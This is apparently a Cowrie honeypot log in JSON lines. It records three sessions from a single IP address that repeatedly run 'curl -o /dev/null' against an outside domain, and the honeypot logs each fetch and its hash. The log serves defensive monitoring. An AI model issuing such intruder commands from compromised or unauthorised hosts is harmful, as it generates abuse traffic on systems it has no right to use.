{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.526321Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.529104Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.530700Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.531353Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.533306Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.533931Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.535914Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.536421Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.568160Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.572044Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.572680Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.575637Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.576514Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.578694Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.579784Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.584899Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.587685Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.590273Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.626475Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.628754Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.630092Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.630678Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.632938Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.634533Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.636118Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.636917Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.675522Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.677778Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.679288Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.679889Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.682410Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.683167Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.685926Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.686573Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.690018Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.718937Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.720788Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.723497Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.725559Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.726334Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.729355Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.729866Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.733725Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.735453Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.769337Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.772834Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.774286Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.774998Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.778492Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.779736Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.783780Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.784644Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.814165Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.816661Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.819974Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.823390Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.826997Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.827887Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.842791Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.843492Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.847783Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.848750Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.856253Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.859154Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.862299Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.889020Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.889832Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.891948Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.892789Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.894986Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.895985Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.929989Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.934350Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.937233Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.941740Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.942420Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.945217Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.946129Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.948435Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.949189Z","src_ip":"212.227.125.160","session":"9f264c568782"}
